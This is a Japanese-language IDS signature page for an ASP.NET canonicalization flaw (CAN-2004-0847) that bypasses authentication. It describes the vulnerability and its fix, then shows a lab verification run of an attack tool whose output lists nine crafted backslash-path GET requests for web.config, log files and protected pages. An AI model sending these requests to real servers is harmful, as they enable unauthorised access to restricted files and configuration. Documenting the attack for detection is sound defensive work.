項目

攻撃

リモート

攻撃ポート

80

対象OS

Windows

CVE

CAN-2004-0847

MS

PAM

Microsoft ASP.NET Framework bypass security (HTTP_ASP_Security_Bypass)

このシグネチャまたは脆弱点について

RealSecure Network SensorRealSecure Server Sensor:


このシグネチャは、Microsoft ASP.NET Framework における正規化の脆弱点が原因で、リモートの攻撃者がセキュリティ制限を回避する可能性のある特殊な形式の URL 要求を検出します。


デフォルトの危険度

中危険度


このシグネチャが添付されているセンサー

RealSecure Network Sensor: XPU 22.34 以降、RealSecure Server Sensor: XPU 22.34 以降


影響を受けるシステム

Microsoft .NET Framework: 任意のバージョン、Microsoft ASP.NET: 任意のバージョン、Windows: 任意のバージョン


タイプ

不正アクセスの試み


脆弱点の説明

Microsoft ASP.NET Framework では、正規化の脆弱点が原因で、リモートの攻撃者がセキュリティ制限を回避する可能性があります。 ユーザーが正しく認証されない場合、web.config ファイルによってファイルへのアクセスが阻止されます。 リモートの攻撃者は、Mozilla を使用してバックスラッシュ (\) を含む特殊な形式の URL 要求を送信したり、Microsoft Internet Explorer を使用して URL エンコードされたバックスラッシュ (%5C) を含む要求を送信したりすることで、この認証方式を回避し、制限されているリソースに不正にアクセスすることができます。


この脆弱点の解決方法

Microsoft Corporation Web サイトから、ASP.NET HTTP モジュールをダウンロードします。




検証環境

優先度

OS

IP

Intruder:

Windows2000

192.168.221.11

Victim:

Windows2000

192.168.221.180

センサー

ProvenitaM10

XPU1.70


C:\tool>w3wp-dos.exe
============================================
w3wp-dos by Debasis Mohanty
www.hackingspirits.com
============================================

Usage: w3wpdos <HostIP / HostName>


C:\tool>w3wp-dos.exe 192.168.221.180
[+] Host name: [+] TEST-LR0IS30UAX
[+] Host IP: 192.168.221.180
[+] Ready to generate requests
[1] GET /aspnet-app\web.config HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host:
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;
.ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D7335
18A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D

........
[2] GET /aspnet-app\../aspnetlogs\log1.logs HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host:
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;
.ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D7335
18A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D

........
[3] GET /aspnet-app\default-userscreen.aspx HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host:
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;
.ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D7335
18A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D

........
[4] GET /aspnet-app\users/config.aspx HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host:
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;
.ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D7335
18A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D

........
[5] GET /aspnet-app\links/anycomref.aspx HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host:
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;
.ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D7335
18A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D

........
[6] GET /aspnet-app\com-ref-link1.aspx HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host:
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;
.ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D7335
18A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D

........
[7] GET /aspnet-app\com-ref-link2.aspx HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host:
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;
.ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D7335
18A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D

........
[8] GET /aspnet-app\com-ref-link3.aspx HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host:
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;
.ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D7335
18A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D

........
[9] GET /aspnet-app\com-ref-link4.aspx HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host:
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;
.ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D7335
18A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D

........


イベント詳細

HTTP_ASP_Security_Bypass